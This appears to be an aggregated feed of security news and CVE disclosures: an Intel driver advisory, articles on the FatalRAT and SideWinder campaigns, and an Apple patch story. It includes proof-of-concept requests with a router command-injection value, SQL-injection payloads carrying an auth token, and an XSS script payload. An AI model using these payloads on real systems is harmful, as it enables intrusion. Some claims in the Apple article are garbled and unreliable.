Uncaught exception in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1436(v2) may allow a privileged user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Iris® Xe MAX Advisory**

**Summary: **

Potential security vulnerabilities in the Intel® Iris® Xe MAX drivers for Windows may allow denial of service or information disclosure.  Intel is releasing software updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-30531

Description: Out-of-bounds read in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1474 may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium  

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

CVEID: CVE-2022-34849

Description: Uncaught exception in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1436(v2) may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 4.4 Medium  

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H  
 

**Affected Products:**

Intel® Iris® Xe MAX drivers for Windows before version 100.0.5.1474.  
 

**Recommendations:**

Intel recommends updating Intel® Iris® Xe MAX drivers for Windows to version 100.0.5.1474 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/products/sku/211013/intel-iris-xe-max-graphics-96-eu/downloads.html  
 

**Acknowledgements:**

Intel would like to thank Ilan Wachtel (CVE-2022-30531) and Ling Cui (CVE-2022-34849) for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-34849: INTEL-SA-00727

By Waqas
The primary target of this malware campaign is Chinese-speaking users in East and Southeast Asia.
This is a post from HackRead.com Read the original post: Google Ads drop FatalRAT malware from fake messenger, browser apps

Find out how Google Ads have been spreading FatalRAT malware recently in fake utility, messenger and browser apps. Learn more about this alarming security issue and how to protect yourself.

Researchers from the Slovak cybersecurity firm ESET have discovered a new malware campaign targeting Chinese-speaking users in East and Southeast Asia.

According to a report published by ESET researchers, hackers are delivering remote access Trojans hidden inside **malicious Google ads**. These misleading ads appear in Google search results and download Trojans installers.

This should not come as a surprise, as Google Ads and **Google Adsense** have been abused lately to deliver malware around the world.

Researchers at ESET noted that the attackers remain unidentified. However, it is confirmed that they are targeting Chinese-speaking individuals. They have designed fake websites that look identical to popular apps like WhatsApp, Firefox, or Telegram.

Through these websites, the attackers deliver remote access Trojans, such as FatalRAT, first detected by AT&T researchers in 2021, to hijack the infected device. Some of the spoofed apps include:

*   LINE
*   Signal
*   Skype
*   Youdao
*   Electrum
*   Telegram
*   WhatsApp
*   WPS Office
*   Mozilla Firefox
*   Google Chrome
*   Sogou Pinyin Method

Researchers discovered the attacks between August 2022 and January 2023. The attack starts by purchasing an ad slot appearing in **Google search results**.

“The attackers purchased advertisements to position their malicious websites in the “sponsored” section of Google search results. We reported these ads to Google, and they were promptly removed,” researchers explained.

Users who search for popular apps are directed to rogue websites with typosquatting domains that host trojanized installers. These installers install the actual app as the user requires, to avoid raising suspicion.

Fake Google Chrome and Telegram websites spreading fake installers infected with FatalRat malware

The FatalRAT malware used in this campaign contains numerous commands to manipulate data from various browsers.

“The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China,” researchers wrote in their technical report published today.

The downloaded installers aren’t hosted on the same server as the sites, but in Alibaba Cloud Object Storage Service, and are digitally signed MSI files. The installers were uploaded to the cloud storage on 6th January 2023.

After the malware is deployed, the attacker gains full control of the device and can execute arbitrary shell commands, run executables, steal data from web browsers, and log keystrokes.

This campaign has no specific targets, as the attackers want to steal exclusive user data, such as web credentials, to sell them on underground hacker forums or launch additional cybercrime campaigns. However, in their **report**, ESET researchers noted that most victims were located in the following countries:

*   China
*   Taiwan
*   Japan
*   Malaysia
*   Thailand
*   Indonesia
*   Myanmar
*   Philippines
*   Hong Kong

**Detection and protection from fake malicious installers**

Fake, malicious installers can be a significant threat to your computer and personal data. To detect and protect against them, here are some steps you can take:

*   First and foremost, use common sense when downloading files. Never download software, or anything else, from a third-party site. Download software only from trusted sources: Download software only from reputable websites, and avoid downloading from unverified sources.
*   **Verify the authenticity of the website:** Check the website’s URL for spelling errors, and look for security badges and trust seals on the site. For example, **it’s Google.com, not ɢoogle.com**.
*   **Use reliable anti-virus software:** Use reliable anti-virus software and keep it updated to protect your computer from malicious software.
*   **Read reviews and comments:** Read reviews and comments about the software before downloading it; this will give you an idea of the software’s authenticity.
*   **Scan downloaded files:** Use anti-virus software to scan the downloaded file before installing it. You should also use **VirusTotal** to check whether the file is malicious or if the URL you are about to visit is safe.
*   **Use sandboxing software:** Use sandboxing software that can run the installer in a virtual environment, keeping your system safe from any potential harm.
*   **Enable security features:** Enable security features on your computer, such as a firewall, to prevent unauthorized access to your system.

1.  Jupyter infostealer delivered through MSI installer
2.  Fake Zoom installers infect PCs with RevCode RAT
3.  Fake 1Password installer stealing user extract data
4.  Fake Tor browser installer drop malware via YouTube
5.  Fake Windows 11 installers infecting PCs with adware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Google Ads drop FatalRAT malware from fake messenger, browser apps

The nation-state threat group has been attacking a wider range of victims and regions than previously thought.

Researchers have linked the slippery SideWinder APT to two malicious campaigns — one in 2020 and one in 2021 — that add more volume to an attack spree attributed to the prolific threat actor over the past several years and demonstrate how extensive its arsenal of tactics and tools really is.

A report published this week by Group-IB links SideWinder (aka Rattlesnake or T-APT4) to a known 2020 attack on the Maldivian government, as well as a previously unknown series of phishing operations that targeted organizations in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka between June and November 2021.

The findings show the group casting a far wider net than previously thought using a trove of tools, including previously unidentified remote access Trojans (RATs), backdoors, reverse shells, and stagers. Researchers' investigation of these attacks also links the group to other known APTs, including Baby Elephant — which may in fact be SideWinder itself — and Donot APT, they said.

The report also sheds more light on the geographically dispersed nature of the group's operations, with researchers uncovering IP addresses controlled by SideWinder located in the Netherlands, Germany, France, Moldova, and Russia, the researchers said.

SideWinder, active since 2012, was detected by Kaspersky in the first quarter of 2018 and thought to primarily target Pakistani military infrastructure. However, this latest report shows that the target range of the group — widely believed to be associated with Indian espionage interests — is far broader than that.

"SideWinder has been systematically attacking government organizations in South and East Asia for espionage purposes for about 10 years," Dmitry Kupin, a senior malware analyst on Group-IB's Threat Intelligence team, wrote in the report.

Specifically, researchers identified more than 60 targets — including government bodies, military organizations, law enforcement agencies, central banks, telecoms, media, political organizations, and more — of the newly identified phishing campaign. The targets are located in several countries, including Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka.

**Sophisticated Phishing Resources**

The phishing attacks — in which SideWinder impersonates known entities in an attempt to lure victims — also demonstrated how vast its phishing infrastructure is, the researchers said. This makes sense, as spear-phishing has long been the group's initial-access method, they said.

The phishing findings, which did not confirm whether SideWinder was successful in its attempts to compromise victims, also reveal something previously unknown about the group: an interest in targeting cryptocurrency.

In the phishing attacks between June 2021 and November 2021, the group impersonated both the Central Bank of Myanmar, using a website in its arsenal that imitates the financial institution, as well as a contactless Internet of Things (IoT) payment system used in India called Nucleus Vision, also known as Nitro Network.

The campaigns also are notable because they demonstrate SideWinder trying to steal cryptocurrency by imitating an Airdrop of NCASH crypto, the researchers said. NCASH is used as a payment means in the Nucleus Vision ecosystem, which retail stores in India have been using, they said.

Specifically, researchers uncovered a phishing link related to Airdrop — an Apple technology for sending files via its mobile devices. When users visited the link (http://5\[.\]2\[.\]79\[.\]135/project/project/index.html) they were asked to register in order to participate in an Airdrop and receive tokens, though it was not specified which ones. By pressing the "Submit details" button, the user activates a script login.php, which researchers believe the group is using to further develop this attack vector.

**Tools and Telegram**

Group-IB also discovered a trove of custom tools used by SideWinder, only some of which had been described publicly before, developed in various programming languages including C++, C#, Go, Python (compiled script), and VBScript.

Part of that arsenal is the group's newest custom tool, SideWinder.AntiBot.Script, an info-stealer written in Python and used in previously documented phishing attacks against Pakistani organizations.

The script can extract a victim's browsing history from Google Chrome, credentials saved in the browser, the list of folders in the directory, as well as meta information and contents of .docx, .pdf, and .txt files. It's a key part of the group's notoriety for conducting "hundreds of espionage operations within a short span of time," Kupin wrote.

Another and perhaps the "most interesting finding" regarding SideWinder's tools arsenal were RAT samples that used the Telegram messaging app as a channel for receiving the results of malware commands and thus retrieve data stolen from compromised systems, Kupin noted.

This tactic is increasingly becoming a hallmark of many advanced threat actors, he said.

**How to Stave Off SideWinder**

The report includes a vast array of indicators of compromise as well as URLs associated with SideWinder attacks.

Because like many other APT groups SideWinder relies on targeted spear-phishing as the initial attack vector, it's important for organizations "to set up business email protection solutions that are capable of detonating malicious attachments in an isolated virtual environment," Kupin tells Dark Reading. Enterprises should also do socially engineered penetration tests so employees can quickly recognize phishing emails that reach inboxes, he adds.

Organizations at risk from SideWinder also should continuously monitor network activity within the organization's perimeter by employing managed extended detection and response (MXDR) solutions that are regularly updated with fresh network indicators and rules, Kupin says.

SideWinder APT Spotted Stealing Crypto

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the province parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取province参数下的内容传递给v11，之后将v11带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules”,
"province":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24236: ttt/19 at main · Am1ngl/ttt

TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取city参数下的内容传递给v12，之后将v12带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"city":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-24238: ttt/20 at main · Am1ngl/ttt

Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines.
The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published

Chinese-speaking individuals in Southeast and East Asia are the targets of a new rogue Google Ads campaign that delivers remote access trojans such as FatalRAT to compromised machines.

The attacks involve purchasing ad slots to appear in Google search results that direct users searching for popular applications to rogue websites hosting trojanized installers, ESET said in a report published today. The ads have since been taken down.

Some of the spoofed applications include Google Chrome, Mozilla Firefox, Telegram, WhatsApp, LINE, Signal, Skype, Electrum, Sogou Pinyin Method, Youdao, and WPS Office.

"The websites and installers downloaded from them are mostly in Chinese and in some cases falsely offer Chinese language versions of software that is not available in China," the Slovak cybersecurity firm said, adding it observed the attacks between August 2022 and January 2023.

A majority of the victims are located in Taiwan, China, and Hong Kong, followed by Malaysia, Japan, the Philippines, Thailand, Singapore, Indonesia, and Myanmar.

The most important aspect of the attacks is the creation of lookalike websites with typosquatted domains to propagate the malicious installer, which, in an attempt to keep up the ruse, installs the legitimate software, but also drops a loader that deploys FatalRAT.

In doing so, it grants the attacker complete control of the victimized computer, including executing arbitrary shell commands, running files, harvesting data from web browsers, and capturing keystrokes.

"The attackers have expended some effort regarding the domain names used for their websites, trying to be as similar to the official names as possible," the researchers said. "The fake websites are, in most cases, identical copies of the legitimate sites."

The findings arrive less than a year after Trend Micro disclosed a Purple Fox campaign that leveraged tainted software packages Adobe, Google Chrome, Telegram, and WhatsApp as an arrival vector to propagate FatalRAT.

They also arrive amid a broader abuse of Google Ads to serve a wide range of malware, or alternatively, take users to credential phishing pages.

In a related development, Symantec's Threat Hunter Team shed light on another malware campaign that targets entities in Taiwan with a previously undocumented .NET-based implant dubbed Frebniis.

"The technique used by Frebniis involves injecting malicious code into the memory of a DLL file (iisfreb.dll) related to an IIS feature used to troubleshoot and analyze failed web page requests," Symantec said.

"This allows the malware to stealthily monitor all HTTP requests and recognize specially formatted HTTP requests sent by the attacker, allowing for remote code execution."

The cybersecurity firm, which attributed the intrusion to an unknown actor, said it's currently not known how access to the Windows machine running the Internet Information Services (IIS) server was obtained.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using Google Ads to Spread FatalRAT Malware Disguised as Popular Apps

It's a classic attacker move: Use security protections against those who deploy them. But organizations can still defuse and prevent these encrypted attacks.

Once upon a time, encrypted traffic was considered the safe, secure option for browsing and doing business online. However, going back to December 2013, the Google Transparency Report shows just 48% of Web traffic was encrypted. Flash forward to today, and the volume of encrypted Web traffic is up to 95%. However, the threat landscape has changed a lot since 2013, and now we find the majority of cyberthreats lurking within encrypted channels.

Hidden in your encrypted Internet traffic layers are malware payloads, phishing scams, sensitive data leaks, and more. To understand this better, the State of Encrypted Attacks 2022 Report analyzed 24 billion threats from October 2021 to September 2022 to reveal details on threats embedded in HTTPS traffic, including SSL and TLS. The report shows a consistent upward trend of attacks using encrypted channels — from 57% in 2020 to 80% in 2021 — ultimately finding that more than 85% of attacks were encrypted in 2022. There were other major findings as well.

**Most Encrypted Threats Involve Malware**

While cybercriminals hide a variety of attack tactics in encrypted traffic, malware remains the most prevalent. Malicious scripts and payloads used throughout the attack sequence make up nearly 90% of the encrypted attack tactics blocked in 2022.

    

Fig. 1. Distribution of 2022 encrypted attacks. Source: Zscaler ThreatLabz

Malware continues to pose the greatest threat to individuals and businesses across nine key industries, with manufacturing, education, and healthcare the most common targets. This category includes ransomware, which remains a top concern for CISOs, as ransomware attacks have increased by 80% year over year.

The most prevalent malware families the ThreatLabz team observed abusing encrypted channels include ChromeLoader, Gamaredon, AdLoad, SolarMarker, and Manuscrypt.

**US, India Are Top Targets for Encrypted Attacks**

The five countries most targeted by encrypted attacks in 2022 were the US, India, South Africa, the UK, and Australia. In addition, several countries saw significant upticks in targets year over year, including Japan (+613%), the US (+155%), and India (+87%).

**Encrypted Attacks Increased in Manufacturing, Education**

More than doubling in encrypted attacks (239%), manufacturing displaced technology as the most targeted industry in 2022. Encrypted attacks against the education industry were also up significantly (134%). Attackers particularly favored manufacturing over other sectors as a target for ad spyware. It is also one of two industries most often phished via encrypted channels — the other being healthcare.

    

Fig. 2. Top vertical industries targeted by encrypted attacks in 2022. Source: Zscaler ThreatLabz

Today, most attacks leverage SSL or TLS encryption, which is resource-intensive to inspect at scale and best done with a cloud-native proxy architecture. While legacy firewalls support packet filtering and stateful inspection, their resource limitations make them poorly suited for this task. This creates a critical need for organizations to implement cloud-native architectures that support full inspection of encrypted traffic in alignment with zero-trust principles.

**How to Protect Yourself**

For defenders, the imperative is clear: all encrypted traffic must be thoroughly inspected to detect and stop cyberthreats before they cause damage. While we wait for governments, compliance frameworks, and other vendors to catch up with this reality, it will be up to defenders and leaders to raise the flag and champion initiatives to mitigate this common threat tactic. Zero-trust strategies and architectures — in which you trust nobody and inspect and authenticate everything — are the most effective way to protect your organization from encrypted attacks and other advanced threats.

Attacks start with reconnaissance and an initial compromise of an endpoint or asset exposed to the Internet. Once inside, attackers perform lateral propagation, including reconnaissance and establishing a network foothold. Finally, attackers act to achieve their objectives, which often involve data exfiltration.

Your defenses should include controls for each of those stages. Minimize the attack surface by making internal apps invisible to the Internet, and prevent compromise by using cloud-native proxy architecture to inspect _all_ traffic inline and at scale, enforcing consistent security policies. Organizations should also stop lateral movement by connecting users directly to applications (rather than the network) to reduce the attack surface, and contain threats using deception and workload segmentation. They can also stop data loss by inspecting all Internet-bound traffic, including encrypted channels, to prevent data theft.

If you are looking to minimize the risk of encrypted attacks for your organization, consider these recommendations as part of your adoption strategy:

*   Use a cloud-native, proxy-based architecture to decrypt, detect, and prevent threats in all encrypted traffic at scale.
*   Leverage an AI-driven sandbox to quarantine unknown attacks and stop patient-zero malware.
*   Inspect all traffic, all the time, whether a user is at home, at headquarters, or on the go, to ensure everyone is consistently protected against encrypted threats.
*   Terminate every connection to allow an inline proxy architecture to inspect all traffic, including encrypted traffic, in real-time — before it reaches its destination — to prevent ransomware, malware, and more.
*   Protect data using granular context-based policies, verifying access requests and rights based on context.
*   Eliminate the attack surface by connecting users directly to the apps and resources they need, never to networks.

Read more Partner Perspectives from Zscaler.

Encrypted Traffic, Once Thought Safe, Now Responsible For Most Cyberthreats

SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10.

\*\*DataEase \*\*  
1.1.0-rc2

**Bug 描述**  
SQL Injection

\*\*Bug \*\*  
url:/api/sys\_msg/list/1/10

    POST /api/sys_msg/list/1/10 HTTP/1.1
    Host: demo.dataease.io
    Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Length: 65
    Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
    Link-Pwd-Token: undefined
    Accept-Language: zh-CN
    Sec-Ch-Ua-Mobile: ?0
    Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
    Content-Type: application/json;charset=UTF-8
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Origin: https://demo.dataease.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.dataease.io/?
    Accept-Encoding: gzip, deflate
    Connection: close
    
    {"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
    

  
  
payload：extractvalue('anything',concat('~',(select database())))

CVE-2021-38239: [Bug]SQL Injection · Issue #510 · dataease/dataease

Cross site scripting (XSS) vulnerability in DiscuzX 3.4 allows attackers to execute arbitrary code via the datetline, title, tpp, or username parameters via the audit search.

**Description**

Admin backend audit search of content audit component with reflected-XSS in POST value “dateline”, “title”, “tpp” and “username”, which bypassed discuz security check and even could hijack callback url link, and it can also inject javascript to setTimeout at the end of html response.

**Affected Version**

DiscuzX <= 3.4, SC\_UTF8\_20221111

**POC**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  

POST /cms/discuz/upload/admin.php?action=moderate&operation=threads HTTP/1.1  
Host: 192.168.0.4  
Content-Length: 166  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.0.4  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.0.4/cms/discuz/upload/admin.php?action=moderate&operation=threads  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: 5Kkn\_2132\_saltkey=y03s5T45; 5Kkn\_2132\_lastvisit=1668496347; 5Kkn\_2132\_ulastactivity=07108qps3b3FkXEEZNxrT%2BtyQpXYN9%2FSOodQCNbMLoO%2BO6DOk8pF; 5Kkn\_2132\_auth=7791L55DZFdkAgcM5rDcnjIiVH0t%2BptlGCIqLkAhUIRMsUDTnq%2BGi7atBCt%2BPdyl2mCVv0hA3jA%2BxaOfDB1h; 5Kkn\_2132\_lastcheckfeed=1%7C1668501456; 5Kkn\_2132\_nofavfid=1; 5Kkn\_2132\_sid=yhpz44; 5Kkn\_2132\_lip=172.17.0.1%2C1668502019; 5Kkn\_2132\_lastact=1668502045%09admin.php%09  
Connection: close  
  
formhash=288a0c1d&scrolltop=&anchor=&username=aa&title=aa&tpp=20&filter=normal&modfid=all&dateline=604"></a><script>alert(1)</script><!--&modsubmit=%E6%8F%90%E4%BA%A4  

**Reference**

*   Gitee Issues (Login Required)
*   CVE

> Reported by Srpopty, vulnerability discovered by using Corax.

CVE-2022-45543: Vulnerability - Discuz X3.4 Backend Reflected XSS (CVE-2022-45543)

By Deeba Ahmed
If you are using an Apple product, it is time to update it right now and make sure the automatic updates are enabled.
This is a post from HackRead.com Read the original post: Update Now: iOS Devices Receive Vital Security Updates from Apple

Apple has released an emergency security patch to fix a critical vulnerability that has been targeting all iOS devices, including iPhones, Macbooks, and Tablets.

Apple has released urgent security patches for a newly detected zero-day vulnerability that can be exploited to hack vulnerable iOS devices, including Macs, iPhones, and iPads.

The vulnerability (tracked as CVE-2023-23529) was found in the WebKit framework of the browser. So, if maliciously designed web content is processed, it would allow arbitrary code execution after an unsuspecting user visits a compromised URL.

“Apple is aware of a report that this issue may have been actively exploited,” the company noted. This explains why the iPhone maker released patches urgently for its flagship devices.

Still, the impact is extensive, as from the iPhone 8 to all subsequent iPhone models will be impacted, as well as every model of iPad Pro, the iPad Air 3rd generation and above, iPad 5th generation and above, and iPad mini 5th generation.

**Which Devices are Impacted?**

An unidentified researcher discovered the flaw, which has been patched with the latest edition of security updates. Apple didn’t specify how this vulnerability could be exploited.

In fact, it is the first time a zero-day has been defined as a newly discovered security flaw. It is a WebKit confusion issue. Moreover, all Macs running Ventura will be impacted. Fixes for all these versions were released in the security update.

**Security Update Details**

The small point update released by Apple on Monday contains WebKit security patches for iOS 16.3.1, iPadOS 16.3.1, and macOS 11.2.1 to fix a zero-day bug. The updates are available for iOS 16, iPadOS 16, macOS Ventura, and the latest edition of Apple Safari, as well as the preceding versions of Big Sur and macOS Monterey.

In addition, Apple released patches for tvOS 16.3.2 and watchOS 9.3.1. The company has yet to release the CVE entries, though. It is also unclear if a fix will be released for iOS 15 devices. If you haven’t updated your device, please do so immediately to stay safe.

1.  Microsoft fixes 6 Active 0-Day Windows Flaws
2.  Israeli Spyware Vendor Exploiting Chrome 0day
3.  Apple Debuts Lockdown Mode to Prevent Spying
4.  Apple Bug bounty: Hack Apple and earn big bucks

Tag

#chrome